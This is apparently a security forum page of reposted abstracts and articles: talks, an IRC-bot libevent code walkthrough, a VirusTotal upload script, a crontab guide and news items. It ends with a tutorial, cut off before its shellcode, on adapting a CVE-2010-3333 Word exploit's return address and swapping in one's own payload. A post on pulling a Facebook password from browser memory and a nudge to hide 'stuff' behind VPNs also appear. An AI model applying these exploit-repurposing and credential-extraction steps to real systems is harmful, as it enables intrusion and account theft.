Nytro

Reverse Engineering Secure Http Api's With An Ssl Proxy Description: Abstract The proliferation of mobile devices has led to increased emphasis on native applications, such as Objective-C applications written for iOS or Java applications written for Android. Nonetheless, these native client applications frequently use HTTP APIs to communicate with a backend server. In addition, browser-based applications are growing more complex, and are also more likely to make asynchronous calls to HTTP APIs. In this presentation, we walk through a common (but insecure) method of securing HTTP APIs with SSL. As we will demonstrate, properly configured SSL will protect a protocol from eavesdropping (man-in-the-middle attack) but will not protect that protocol from the end user himself. In particular, we demonstrate how an end user can use an SSL proxy to decrypt and reverse engineer the HTTP API. We will show a hypothetical HTTP API over SSL that tracks high scores for games. Then we will demonstrate an attack on that HTTP API using mitmproxy, an open source SSL proxy, to show how an attacker can forge a high score, even though the protocol is tunneled over SSL. We will then demonstrate a modified HTTP API that is resistant to this type of attack. Finally, we will wrap up by discussing other applications of SSL proxies to web application security testing, such as analyzing HTTP APIs to see if any personal information – such as a user’s address book – are being transmitted over the API. This is the same technique used by researcher Arun Thampi in February 2012 to determine that the Path application on iOS was secretly uploading users’ contacts to its HTTP API. ***** Speakers Alejandro Caceres, Computer Network Operations Engineer, Lunarline Inc. I am a computer network operations engineer focused on building software products and interested in breaking things, mostly. I've been told I have a "hacker" mindset by my co-workers (I like to think that they meant it in a good way) and that is entirely true. I work on a number of open source projects related to pen testing and particularly enjoy dealing with unique ways of automating exploitation of web applications. Mark Haase, Sr. Security Software Engineer, Lunarline, Inc. I've been writing software since I was 13, writing software as a job since Junior year of college, and working professionally as a software engineer since I graduated in financial services and then information security. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Reverse Engineering Secure HTTP API's With an SSL Proxy - Alejandro Caceres and Mark Haase on Vimeo Sursa: Reverse Engineering Secure Http Api's With An Ssl Proxy

Dumping Memory Password Using Task Manager Description: This video is about dumping the memory contents of a process using task manager. In this video i have extracted a facebook account's password from browser memory dump using winhex. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Dumping Memory Password Using Task Manager

[h=1]Event driven socket programming[/h]Author: [h=3]nslay[/h]I've been working on a fully featured IRC bot for a couple months on/off and I usually write my own IO multiplexer. This time, however, I gave libevent a try and decided to share my experiences. libevent Anyway, if you're not familiar with event-driven design and you're interested in socket programming, I strongly recommend you learn about event driven programming first since it tends to make socket programming easier and more flexible. Then employ something like libevent (or write your own) that allows you to hook IO events for sockets. You'll find that your code Generalizes to multiple sockets with no effort (and no threads) Often implicitly supports timers with no effort (depending on the underlying polling mechanism you use) Generalizes to multiple protocols (since you can just hook protocol-dependent handlers per socket) Seamlessly integrates with OOP well (rather than have one object that has a blocking recv() loop, just implement an OnRead() method and support multiple objects simultaneously!) Anyway, here's my IRC bot. It is fully featured, though since it's a replica of something written in ~1998, doesn't have cool features like searching wikipedia (for example). http://sourceforge.n...rojects/ircbnx/ To see examples of event driven design, look at IrcClient.cpp and BnxDriver.cpp. Specific snippits are included below. Relevant snippits from IrcClient.cpp Here's a nifty trick to dispatch C callbacks to C++ member functions (I learned this trick from here) template<void (IrcClient::*Method)(evutil_socket_t, short)> static void Dispatch(evutil_socket_t fd, short what, void *arg) { IrcClient *pObject = (IrcClient *)arg; (pObject->*Method)(fd, what); } You can redirect C callbacks to your C++ member functions. In this case, I use it dispatch C callbacks to the following basic IO/timer functions: // Libevent callbacks void OnWrite(evutil_socket_t fd, short what); void OnRead(evutil_socket_t fd, short what); void OnSendTimer(evutil_socket_t fd, short what); You can use the basic Read/Write events to determine When a socket has completed a connection (OnWrite() is called) Receiving data (OnRead() is called and recv() returns > 0) When the remote host has closed the connection (OnRead() is called and recv() returns 0) Here's how you do it in an event driven framework. Here is IrcClient::Connect() First create the socket: bool IrcClient::Connect(const std::string &strServer, const std::string &strPort) { if (m_socket != INVALID_SOCKET) Disconnect(); m_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (m_socket == INVALID_SOCKET) { Log("socket failed (%d): %s", errno, strerror(errno)); return false; } Next, set it to non-blocking. Non-blocking means that connect() and recv() will never put the process to sleep until the request has completed. It's easy to understand why you want this in the context of multiple connections. If you are handling 50 sockets, and you do not enable non-blocking I/O, then mishandling just one of those sockets causes the process to hang (and the other 49 sockets will not receive service until a request has completed one that one socket). #ifdef _WIN32 u_long opt = 1; if (ioctlsocket(m_socket, FIONBIO, &opt) != 0) { Log("ioctlsocket failed (%d)", WSAGetLastError()); CloseSocket(); return false; } #else // _WIN32 int flags = fcntl(m_socket, F_GETFL); if (fcntl(m_socket, F_SETFL, flags | O_NONBLOCK) == -1) { Log("fcntl failed (%d): %s", errno, strerror(errno)); CloseSocket(); return false; } #endif // !_WIN32 In this code, I use getaddrinfo() to resolve hostnames. It is more flexible and hides the hackish way you normally resolve a hostname and setup a sockaddr. struct addrinfo hints, *pResults = NULL; memset(&hints, 0, sizeof(hints)); hints.ai_flags = AI_PASSIVE; hints.ai_family = AF_INET; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; int e = getaddrinfo(strServer.c_str(), strPort.c_str(), &hints, &pResults); if (e != 0) { Log("getaddrinfo failed (%d): %s", e, gai_strerror(e)); CloseSocket(); return false; } Now we connect the socket. It will most likely fail with EAGAIN or WSAEWOULDBLOCK depending on platform. These mean the connection in progress and not yet completed and so you must treat these as not errors. // NOTE: Cast to socklen_t since Windows make ai_addrlen size_t e = connect(m_socket, pResults->ai_addr, (socklen_t)pResults->ai_addrlen); #ifdef _WIN32 int iLastError = WSAGetLastError(); if (e != 0 && iLastError != WSAEWOULDBLOCK) { Log("connect() failed (%d)", iLastError); CloseSocket(); freeaddrinfo(pResults); return false; } #else // _WIN32 if (e != 0 && errno != EINPROGRESS) { Log("connect() failed (%d): %s", errno, strerror(errno)); CloseSocket(); freeaddrinfo(pResults); return false; } #endif // !_WIN32 freeaddrinfo(pResults); Now, we create our event contexts and hook them. The write event is only meant to be triggered once to determine connectivity, hence EV_PERSIST is missing. Our read event is intended to be used to receive data and is set to EV_PERSIST. The last created event is a timer for send queues. We only initially need to hook OnWrite() since we need to determine when the connect() has actually completed. Once it completes, we can then hook OnRead() and OnSendTimer(). Notice the use of the templated Dispatch() function. Nifty huh? // XXX: Handle errors? m_pWriteEvent = event_new(m_pEventBase, m_socket, EV_WRITE, &Dispatch<&IrcClient::OnWrite>, this); m_pReadEvent = event_new(m_pEventBase, m_socket, EV_READ | EV_PERSIST, &Dispatch<&IrcClient::OnRead>, this); m_pSendTimer = event_new(m_pEventBase, -1, EV_PERSIST, &Dispatch<&IrcClient::OnSendTimer>, this); event_add(m_pWriteEvent, NULL); m_strCurrentServer = strServer; m_strCurrentPort = strPort; return true; } Now here's OnWrite(). First it hooks OnRead() and then it sets up the send queue timer to run in 0.5 second increments. Because the write event was not created with EV_PERSIST, it will only trigger once. void IrcClient::OnWrite(evutil_socket_t fd, short what) { event_add(m_pReadEvent, NULL); // TODO: Tunable for send timer struct timeval tv; tv.tv_sec = 0; tv.tv_usec = 500000; event_add(m_pSendTimer, &tv); m_clSendCounter.SetTimeStep(0.5f); OnConnect(); } And finally, here's OnRead() which constructs lines (since SOCK_STREAM sockets may produce fragmented data). If there are unexpected problems (such as remote host closing connection), then it dispatches said events. void IrcClient::OnRead(evutil_socket_t fd, short what) { #ifdef _WIN32 int readSize = recv(m_socket, m_stagingBuffer + m_stagingBufferSize, (int)(sizeof(m_stagingBuffer)-1-m_stagingBufferSize),0); #else // _WIN32 ssize_t readSize = recv(m_socket, m_stagingBuffer + m_stagingBufferSize, sizeof(m_stagingBuffer)-1-m_stagingBufferSize,0); #endif // !_WIN32 if (readSize == 0) { Log("Remote host closed the connection."); OnDisconnect(); return; } else if (readSize < 0) { Log("recv() failed (%d): %s", errno, strerror(errno)); OnDisconnect(); return; } time(&m_lastRecvTime); m_stagingBufferSize += readSize; m_stagingBuffer[m_stagingBufferSize] = '\0'; char *p, *q; p = q = m_stagingBuffer; // We check the buffer size since Disconnect() can be called somewhere in ProcessLine() while (m_stagingBufferSize > 0 && (q = strpbrk(p,"\r\n")) != NULL) { *q = '\0'; m_stagingBufferSize -= (q-p) + 1; if (q != p) ProcessLine(p); p = q + 1; } memmove(m_stagingBuffer, p, m_stagingBufferSize); } Relevant snippits from BnxDriver.cpp Lastly, you need to actually dispatch the events. libevent makes this very simple. Here's BnxDriver::Run(). Notice that it can seamlessly handle multiple BnxBot objects with just one thread. bool BnxDriver::Run() { if (!Load()) return false; struct event_base *pEventBase; pEventBase = event_base_new(); for (size_t i = 0; i < m_vBots.size(); ++i) { m_vBots[i]->SetEventBase(pEventBase); m_vBots[i]->StartUp(); } event_base_dispatch(pEventBase); event_base_free(pEventBase); return true; } Conclusion For socket programming, you should definitely seek an event-driven design for simplicity and scalability. Enjoy. If you want to see the code, check the repository or download the source zip. It's too big to paste here. http://sourceforge.n.../85/tree/trunk/ http://sourceforge.n...s/ircbnx/files/ Sursa: Event driven socket programming - rohitab.com - Forums

[h=3]YAPS.py 0.3 released – Python script to upload samlpes to VirusTotal[/h] Finished automation of a process to upload samples from multiple trackers. Hope You can add it to Your systems and daily jobs. History, requirements and installation – see here Link to get – YAPS.py don’t forget to remove _.txt ) What added: 1. Added check of sample, if it already present on VirusTotal database. If so – just data dumped to log 2. If sample not present – it uploaded to VirusTotal. 3. All info about samples: Is sample new, SHA256 hash, detect ratio and URL to review – dumped to vtlog.txt at same dir 4. Comments added – in case You need to comment samples. by default enabled on already detected samples. Edit comment variable if needed. Currently there is a problem to comment just submitted file – will be solved. 5. All this within ToS of VirusTotal and thx to them for good tool Hope it useful not to me Stay Safe D.L. #!/usr/bin/python # # Script to upload samples to VT via API # ver 0.3 # # Require: # * Requests python library - grab here http://docs.python-requests.org/en/latest/ # Usage: # python yaps.py path/to/malware.exe # Wildcard: # python yaps.py path/to/* or path/to/*.exe etc # # Variables: # api_key - take Your API from Virustotal # comment2add - comment that added to sample, in case You upload bunch of simular samples # # By Denis Laskov @it4sec http://ondailybasis.com # # Special thx: # @joelverhagen for hashing function sample import requests, sys, fileinput, time, hashlib api_key = '' #public API from VT comment2add = '#Malware ' if api_key == '': print 'API Key is empty. Go at www.virustotal.com and past one at api-key var' SHA = '' headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; uploaded by YAPS.py @it4sec)'} url = 'https://www.virustotal.com/vtapi/v2/file/scan' #URL to submit files url2 = 'https://www.virustotal.com/vtapi/v2/file/report' #URL to review reports url3 = 'https://www.virustotal.com/vtapi/v2/comments/put' #URL to submit comments post_data1 = {'apikey': api_key} def sha256sum_f(filePath): # SHA256 function fh = open(filePath, 'rb') m = hashlib.sha256() while True: data = fh.read(8192) if not data: break m.update(data) return m.hexdigest() def upload_f(filePath): # Upload sample func file2send = {'file': open(filePath, 'rb')} r = requests.post(url, post_data1, files=file2send, headers=headers) #print r.json return r.json def VTcheckl_f(hash_value): #check VT status of sample post_data2 = {'resource': SHA, 'apikey': api_key} print 'Checking: ', fileinput.filename(), ' sha256: ', SHA #print post_data2 r = requests.post(url2, post_data2, headers=headers) return r.json def timer_f(): # timer of 15 seconds to stay within VT API ToS print 'Waiting 15 seconds to comply VT ToS' time.sleep(15) def Report_f(isnew, json): # Func to write to report n = open('./vtlog.txt', 'a') n.write ('\n\nAlready reported: ' + str(isnew)) n.write ('\nFilename: ' + str(fileinput.filename())) n.write ('\nsha256: ' + str(json['sha256'])) try: n.write ('\nDetection Ratio: ' + str(json['positives']) + '/' + str(json['total'])) except KeyError: n.write ('\nDetection Ratio: Unknown' ) pass n.write ('\nURL: ' + str(json['permalink'])) n.close def Comment_f(SHAsum): post_data3= {'resource': SHA, 'apikey': api_key, 'comment': comment2add} r = requests.post(url3, post_data3, headers=headers) for line in fileinput.input(): SHA = sha256sum_f(fileinput.filename()) response = VTcheckl_f(SHA) status = response['response_code'] if status == 0: print 'New sample: ', fileinput.filename(), ' uploading' timer_f() newstatus = upload_f(fileinput.filename()) Report_f('No', newstatus) #Comment_f(SHA) if status != 0: print 'Sample ', fileinput.filename(), ' already known or in process' Report_f('Yes', response) Comment_f(SHA) timer_f() fileinput.nextfile() Sursa: Day by day… | YAPS.py 0.3 released – Python script to upload samlpes to VirusTotal

[h=2]How to: Use crontab to schedule tasks[/h]Sunday, January 06, 2013 If you want to schedule to run a command or script periodically, crontab will be a very useful tool. To add a command or a script to the crontab schedule, the command you need to use is: sudo crontab -e On my Arch Linux box, the default text editor is "vi" but on Linux Mint, when you run this command the first time, you will be asked to choose a text-editor. And similarly, the crontab file of Arch Linux is pure blank when the one of Linux Mint has many useful comment lines for you to understand how to use crontab. Here is the how the crontab file looks on Linux Mint (the text editor is nano ): The comment lines in the image above explain quite well about how to use crontab. The format to schedule a task with crontab is: * * * * * /any/command/or/script As you can see, there are 5 stars ( with a space between 2 stars) and each star represents one part of the date format in the following order: - minute ( value = 0 -> 59) - hour ( 0 -> 23) - day of month ( 1 -> 31) - month ( 1 -> 12) - day of week ( 0 -> 6 with 0 = Sunday) In short, to set a certain period to run a script, you just need to replace each star with a specific value. Note: If you dont need to set any value for a star, just leave the star in the command. A star means "every" so a command with all 5 stars will mean to run a task every minute until you delete this command from the crontab schedule. For example, to run a script at 7:00 AM on every Monday in the first three months of the year, the command will be: 0 7 * 1-3 1 /path/to/the/script As you can see, crontab is quite flexible with it format. You can use 1-5 in the day of week value to schedule a task to be run on work days. Or to run something on Monday, Tuesday and Thursday only, you can use 1,2,4 for the day of week value. For example, to run a script every 20 minutes on Monday, Tuesday and Thursday in January, Feb, May and Oct, the command will be: 0,20,40 * * 1,2,5,10 1,2,4 /path/to/the/script Crontab also has some special keywords for you to use: @reboot at startup @yearly once a year @annually ( == @yearly) @monthly once a month @weekly once a week @daily once a day @midnight ( == @daily) @hourly once an hour If you use the keywords, you dont need to use the stars. For example, to run a script once everyday, the command will be: @daily /path/to/the/script And after you insert the right command the crontab file, just save the file and everything is scheduled now. To check the task you have scheduled with crontab, the command to use will be: sudo crontab -l Sursa: How to: Use crontab to schedule tasks ~ Linux and Life

16 of the Best Free Perl Books Individuals wanting to learn and develop their understanding of the Perl programming language have a huge selection of books to choose from. There are hundreds of enlightening Perl books that are available to purchase at reasonable cost. However, given that Perl is an open source programming language, with an eclectic heritage written by Larry Wall and a cast of thousands, it is satisfying to see that some authors have made their Perl publications available to download without charge, and released under a freely distributable license. Perl is a high-level, general-purpose, interpreted, scripting, dynamic programming language released under the GPL or Artistic license. It is available for most operating systems. Perl is implemented as an interpreted (not compiled) language. It is procedural, with variables, expressions, assignment statements, control structures, blocks and subroutines. Whilst Perl is not an acronym, it is sometimes known as Practical Extraction and Report Language and lightheartedly as the Pathologically Eclectic Rubbish Lister. Perl can be used for a large number of tasks. It is often used to write CGI scripts. It is also frequently used for text manipulation, general web programming, networking, system administration, prototyping, database access, and graphical programming. One of the most powerful features of Perl is its extensive library of modules. Many of these modules are available from the Comprehensive Perl Archive Network, which mirrors over 100,000 Perl modules. The focus of this article is to select some of the finest Perl books which are available to download for free. The majority of the books featured here can also be freely distributed. So get reading, learning and sharing. [TABLE=width: 100%] [TR] [TD=colspan: 2] 1. Modern Perl [/TD] [/TR] [TR] [TD][/TD] [/TR] [/TABLE] [TABLE=width: 100%] [TR] [TD]Website[/TD] [TD]www.onyxneon.com/books/modern_perl/index.html[/TD] [/TR] [TR] [TD]Author[/TD] [TD]chromatic[/TD] [/TR] [TR] [TD]Format[/TD] [TD]PDF, A4 PDF, HTML, ePub[/TD] [/TR] [TR] [TD]Pages[/TD] [TD]204[/TD] [/TR] [/TABLE] Modern Perl is designed to help programmers of all levels of proficiency. The book is not only a Perl tutorial. It concentrates on Perl 5.12 and 5.14, to demonstrate the latest and most effective time-saving features. Modern Perl explains how and why the language works, so that the full power of Perl can be unleashed. Modern Perl is one way to describe the way the world's most effective Perl 5 programmers work. They use language idioms. They take advantage of the CPAN. They show good taste and craft to write powerful, maintainable, scalable, concise, and effective code. This book providing a wealth of information on: The Perl Philosophy Perl and its Community focusing on CPAN, community and development sites The Perl Language introducing names, variables, values, control flow, scalars, arrays, hashes, coercion, packages, references, and nested data structures Operators - a series of one or more symbols used as part of the syntax Functions - a discrete, encapsulated unit of behaviour Regular Expressions and Matching - the use of these expressions gives Perl its incredible text processing power Objects - discrete, unique entities with their own identities Style and Efficacy explaining the importance of writing maintainable, idiomatic, and effective Perl Managing Real Problems covering testing, handling warnings, files, modules, distributions, and more Perl Beyond Syntax What to Avoid The electronic versions of this book are released under the Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License. 2. Beginning Perl [TABLE=width: 100%] [TR] [TD]Website[/TD] [TD]www.perl.org/books/beginning-perl/[/TD] [/TR] [TR] [TD]Author[/TD] [TD]Simon Cozens[/TD] [/TR] [TR] [TD]Format[/TD] [TD]PDF, HTML[/TD] [/TR] [TR] [TD]Pages[/TD] [TD]672 [/TD] [/TR] [/TABLE] Beginning Perl is a book which as its name suggest is written for individuals that are new to programming who want to learn Perl. It starts from the absolute basics of Perl, guiding the reader carefully through up to complex operations such as using Perl as a CGI language. The book covers the following topics: Installing Perl on Windows and UNIX Making use of online Perl resources like CPAN First principles in programming and the Perl syntax Working with simple values Lists and Hashes Loops and Decisions Regular Expressions Working with files and databases Writing web pages in Perl Subroutines Running and Debugging Perl Modules Using Perl as an object-oriented language Perl and Databases The World of Perl The book is licensed under the Creative Commons Attribution-NoDerivs-NonCommercial License. Restul cartilor: http://www.linuxlinks.com/article/2013010507211097/16oftheBestFreePerlBooks-Part1.html

[h=1]WebOS Ports gets Open webOS up and running on the Google Nexus 7 [/h]by Derek Kessler Mon, 31 Dec 2012 1:05 pm EST As if the Samsung Galaxy Nexus Open webOS port wasn't enough, WebOS Ports has announced a new porting project: Open webOS on the Google Nexus 7. The seven-inch Android-powered tablet built by Asus was the premiere launch devices for Android 4.1 Jelly Bean, and thanks to the open source and open hardware nature of the device, it is the perfect fit for WebOS Ports's next porting adventure. Seeing how much we loved the small seven-inch TouchPad Go, it's no surprise that the equally small Nexus 7 tablet was on the radar of WebOS Ports. Though larger, the 1280x800 screen on the Nexus 7 is close enough in pixel dimensions to the 1280x720 screen on the Galaxy Nexus, so a lot of the work put into the smartphone project could be easily translated to the Nexus 7. How easy? This work was led by WebOS Ports's Simon "morphis" Busch over the course of about a week while he was on winter break from college. The port was accomplished with the Galaxy Nexus project in conjunction with LibHybris, created by Carsten Munk (an engineer at Jolla, though he also leads Merproject, which grew out of Sailfish ancestors Maemo and Meego), a library that allows for "bionic-based [Android] hardware adaptations in glibc systems", in essence making it easier to translate between the designed-for-Android hardware and Linux-based software like the Open webOS operating system. This means that with LibHybris the WebOS Ports team won't have to write drivers from scratch for different Android-based devices they might wish to attack. In addition to LibHybris, the Nexus 7 leverages the work of those involved in Merproject, FreeSmartphone, and SHR Project. A video of the port in action is after the break, and as an early alpha we're rather impressed. Open webOS on the Nexus 7 runs generally smoothly (there's some intermittent and infrequent lag, which isn't anything too surprising at this stage) and has improved considerably from our last look at Open webOS on the Galaxy Nexus. In addition there's now an Enyo 2-based Settings app that allows you to toy with things like the Wi-Fi and brightness settings and the new OWO Memos app (also Enyo 2 based). The port also supports the classic webOS tablet keyboard, the made-for-the-Galaxy-Nexus virtual gesture area, and forward-swipe-driven screen rotation. Essentially, it's like webOS on the TouchPad Go, except on the slimmer, lighter, faster, newer Nexus 7 and more open source-y. Oh, and did we mention that it runs untethered now? Yeah, it does that. Being able to use Open webOS on the device without being hooked up to your computer is a big deal, and we're really quite psyched to see that happen. You still have to boot from a desktop, but after that you can unplug the cable and get on with the webOSing. The Nexus 7 Open webOS port is still in its early stages, but thanks to the work done on the Galaxy Nexus port it's come a long way in a relatively short time. We're looking forward to what's coming next. Sursa: WebOS Ports gets Open webOS up and running on the Google Nexus 7 | webOS Nation

http://www.youtube.com/watch?v=w9X1CP_jF6k

Si daca de exemplu folosesc autoruns? Sau alte 20 de utilitare?

Smartmeter Description: SMARTMETER A technological overview of the German roll-out This talk will give an overview on the technology, the laws and the technical guidelines of the smartMeter roll-out in Germany. SmartMeter are an ongoing topic in many countries. Sometimes the roll-out is driven by companies, sometimes by laws. Implementation fails, security nightmares and privacy issues have been covered even by the lamestream media. The next big roll-out will happen in Germany. This talk will give an overview of the planed roll-out and the laws and technical guidelines. The “Energiewirtschaftsgesetz” (ENWG) was renewed in 2005 and amended in the following years to reflect aspects like smart grids and renewable energy sources. It also covers the energy directives. The important aspect is that it makes the roll-out a law. In charge of the roll-out is the “Bundesministerium für Wirtschaft und Technologie” (BMWi) which delegates the task of defining the technical details to the “Bundesamt für Sicherheit in der Informationstechnik” (BSI). The BSI therefore is in the process of developing a so-called protection profile (PP) (or common criteria) for smart meter gateways and security module used in a smart meter. The BSI also develops a technical guideline (TR 03109) which describes how the communication related details of whole smart meter infrastructure have to be implemented to provide security and interoperability. This talk will present the different roles defined by the TR and PP. The rights and duties of the different roles in the model will be presented. The cryptographic mechanisms that will be used to secure the communication will be shown. Further the additional services that are planned to be supported and the use cases that are defined for the smart metering system will be explained. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Smartmeter

At Clubhack 2012: Talk On Owasp Xenotix Xss Exploit Framework V2 Description: At ClubHack 2012: Talk on OWASP Xenotix XSS Exploit Framework v2 Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: At Clubhack 2012: Talk On Owasp Xenotix Xss Exploit Framework V2

[h=1]Cum vor sa castige bani retelele sociale precum Facebook[/h] Acoperirea a milioane de consumatori (potentiali clienti) Exista numeroase moduri de a ajunge la un anumit public in marketing. Printre acestea, se numara formularea unui chestionar pentru o cunoastere consolidata a propriei clientele si a mediilor in care sa faceti publicitate produsului dumneavoastra pentru a-l vinde cel mai bine. De exemplu, daca vindeti un tractor nou pentru o ferma agricola, ii veti face publicitate intr-o revista cumparata cu predilectie de fermieri. Astfel, acoperiti un segment de piata care va asigura cel mai mare volum de vanzari. Internetul et cookie-urile Daca detin un software care analizeaza frecventa operatiunilor de cumparare de catre fermieri pentru un anumit teritoriu... de exemplu, pot lansa cookie-uri pe un site web de vanzari online de tractoare pentru a inregistra de unde provin persoanele care viziteaza site-ul, care vand sau cumpara aceste tractoare, etc.. Ti-as putea spune, daca ai recurs la serviciile mele, la ce targ agricol ar trebui sa mergi pentru a avea cele mai mari sanse sa iti vinzi tractoarele. Asta pentru ca cookie-urile mele au detectat numerosi clienti potentiali in zona respectica. Cat ai fi dispus sa platesti pentru un astfel de serviciu de marketing? Investitiile pentru gasirea unor potentiali clienti s-ar reduce enorm, intrucat nu trebuie sa angajezi o armata de vanzatori care sa prospecteze piata in ani si ani de zile. Astfel, Facebook si retelele de socializare in general utilizeaza astfel de cookie-uri, sau ar putea sa le utilizeze pentru a gasi cumparatorii (cumparatoarele) unor diverse produse, indiferent ca sunt de lux ori produse de uz zilnic. Iar intreprinderile nu ar trebui decat sa cumpere aceste liste. Astfel de liste sunt disponibile in agentii de publicitate din intreaga lume. Acestea au un pret initial care variaza in functie de piata pe care doresti sa o abordezi. Cu cat lista este mai specializata, cu atat crearea acesteia costa mai mult, si pretul de vanzare este mai mare. O lista de baza, precum nume, prenume, adresa, nr. de telefon, etc., costa aproximativ 40 de dolari pentru 1000 de clienti potentiali, in SUA. O lista cu informatii precum activitatile exercitate, orasul de resedinta, numarul de proprietati dobandite de-a lungul vietii, stilul de viata al cumparatorilor, etc., are un pret mediu de aproximativ 120 de dolari pentru 1000 de clienti potentiali, tot in SUA. In prezent, Facebook merge si mai departe, datorita cookie-urilor si a obiceiurilor de cumparare ale consumatorilor. Aceasta va permite stabilirea ca tinta precisa a milioane de persoane, cu o fiabilitate marita cu 500%, intrucat Facebook poate utiliza un program software de recunoastere a cuvintelor de pe site-ul propriu. De exemplu, programul software poate urmari toate persoanele care au folosit cuvantul Mercedes Benz in postarile lor. Facebook va putea stabili astfel o lista de marketing extrem de precisa. Si bineinteles, pretul unei astfel de liste creste. Imaginati-va ca sunteti pe Facebook, discutati cu fratele ori cu un cumnat, si spuneti la un moment dat: „Da, ma gandesc sa cumpar o masina noua, un Mercedes Benz, in vreo doua zile”. Programul software recupereaza numele dumneavoastra, numele de utilizator, orasul in care locuiti, activitatea profesionala exercitata si orice alte informatii pertinente pentru a-si da seama de la ce firma de vanzare de automobile ati putea cumpara masina. Un reprezentant Facebook va suna la respectiva firma si va conveni cu aceasta sa ii furnizeze aceste informatii contra unei sume de bani. Dumneavoastra veti primi un telefon de la firma de automobile in cauza, care va invita sa profitati de o oferta de nerefuzat… Si uite-asa avem un tip de marketing cu o tinta extrem de precisa. Iar aceasta practica va aduce un venit de miliarde de dolari retelei Facebook. O astfel de lista poate ajunge la 2500 pana chiar la mai mult de 5000 de dolari pentru 1000 de clienti potentiali, inmultit, evident, cu numarul de utilizatori de Facebook. Evident, Facebook va stabili, de asemenea, asocieri, legaturi cu alte site-uri, va recomanda membrilor cumparaturi, prin intermediul altor site-uri, si altele de acest gen (marketing indirect). Iti poti face macar o cat de mica idee de bogatia pe care o detine aceasta companie. Iar acest proces urmeaza sa fie implementat de toate retelele sociale care exista in prezent pe web. Sursa: Cum vor sa castige bani retelele sociale precum Facebook

[h=4]Which VPN Service Providers Really Take Anonymity Seriously?[/h] Daca tot faceti "chestii", nu va riscati. Folositi cel putin VPN (ca cele de aici). Daca nu e ok, atunci Tor. Link: http://torrentfreak.com/which-vpn-providers-really-take-anonymity-seriously-111007/

When the cops subpoena your Facebook information, here's what Facebook sends the cops NU e noua informatia, dar mi se pare utila. Published Apr 06 2012, 08:30 AM by Carly Carioli -- would not have been possible without access to a huge trove of case files released by the Boston Police Department. Many of those documents have never been made public -- until now. As a kind of online appendix to the article, we're publishing over a dozen documents from the file, ranging from transcripts of interviews to the subpoenas that investigators obtained from the tech companies that helped them track the killer's digital fingerprints. We've also published the crime scene photos and uploaded recordings made by investigators as they interviewed the killer, Philip Markoff, and others involved in the case. One of the most fascinating documents we came across was the BPD's subpoena of Philip Markoff's Facebook information. It's interesting for a number of reasons -- for one thing, Facebook has been pretty tight-lipped about the subpoena process, even refusing to acknowledge how many subpoenas they've served. Social-networking data is a contested part of a complicated legal ecosystem -- in some cases, courts have found that such data is protected by the Stored Communications Act. In fact, we'd never seen an executed Facebook subpoena before -- but here we have one, including the forms that Boston Police filed to obtain the information, and the printed (on paper!) response that Facebook sent back, which includes text printouts of Markoff's wall posts, photos he uploaded as well as photos he was tagged in, a comprehensive list of friends with their Facebook IDs (which we've redacted), and a long table of login and IP data. This document was publicly released by Boston Police as part of the case file. In other case documents, the police have clearly redacted sensitive information. And while the police were evidently comfortable releasing Markoff's unredacted Facebook subpoena, we weren't. Markoff may be dead, but the very-much-alive friends in his friend list were not subpoenaed, and yet their full names and Facebook ID's were part of the document. So we took the additional step of redacting as much identifying information as we could -- knowing that any redaction we performed would be imperfect, but believing that there's a strong argument for distributing this, not only for its value in illustrating the Markoff case, but as a rare window into the shadowy process by which Facebook deals with law enforcement. As far as we can tell, nobody's ever seen what one of these looks like -- and we're hoping the social media, law, and privacy experts out there can glean insight from it: Gasiti aici PDF: http://blog.thephoenix.com/BLOGS/phlog/archive/2012/04/06/when-police-subpoena-your-facebook-information-heres-what-facebook-sends-cops.aspx

Reversing a Malicious Word Document Anonymous January 04, 2013 In this post, I am going to explain in detail how to go about reversing an exploit with which one can easily insert his/her own payload, providing an exploit sample is available. I have taken exploit sample CVE 2010-3333 in order to complete this exercise. So let’s first explore this document (Laden’s Death.doc) to see whether it’s an exploit or not by just looking at it in hex editor. We know that the vulnerability exists in pFragment, so in the given sample we have to find the parameter of pFragment and have to analyze something suspicious. When I opened the document in hex, I found something suspicious as an address in pFragment parameter and that is bc41db77; let’s search this address in debugger (77db41bc): Address not found. That’s why, when I executed this sample, it crashed, as shown in the following picture: Anyway, I am not going to explain the crash analysis here. Our goal is to replace the payload in this exploit with our own payload. But, in brief, it/s crashing because the address used in this exploit sample (77db41bc) is taken from user32.dll of xp sp2, but I am using xp sp3, so this address is not available. It can be made workable on xp sp3, by taking any address from the xp sp3 dll. I took it from kernel 32.dll ‘jmp esp address and replaced it with 7b46867c (jmp esp address of kernel32.dll xp service pack 3). Then it worked fine. When the RTF file is opened, the exploit executes the shell code and drops a file named server.exe inside C:/RECYCLER and executes it. C:/RECYCLER/server.exe does the following: • Drops a file in the system’s temp folder: vmm2.tmp • File vmm2.tmp is renamed and moved to c:\windows\system32\dhcpsrv.dll • Makes registry modifications in an attempt to hijack the DHCP service The payload has the ability to: • Download additional malware • Connect and send sensitive data back to remote servers • Act as a trojan proxy server So let me first analyze the shell code for server.exe, where there are actually two ways to analyze it. 1) In hex editor 2) In debugger Let me open sample in hex editor and try to find the shell code for server.exe. While analyzing in hex we found something suspicious; that is address 7b46867c. This address has been taken from the ntdll file, and the shell code begins from eb10 till eeeeeeeeeeee, as shown in the following figure: at eeeeeeeeeeeee After a deep analysis, we found that the shell code has been encrypted by 8-bit EE XOR, as in the instruction XOR BYTE PTR DS [EDX+ECX], 0EE Also encryption begins from last to start, that is from eeeeeeee to the start of the shell code. Now it’s time to replace the full shell code by your own code. I have the following shell code that will execute calc from our server: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: 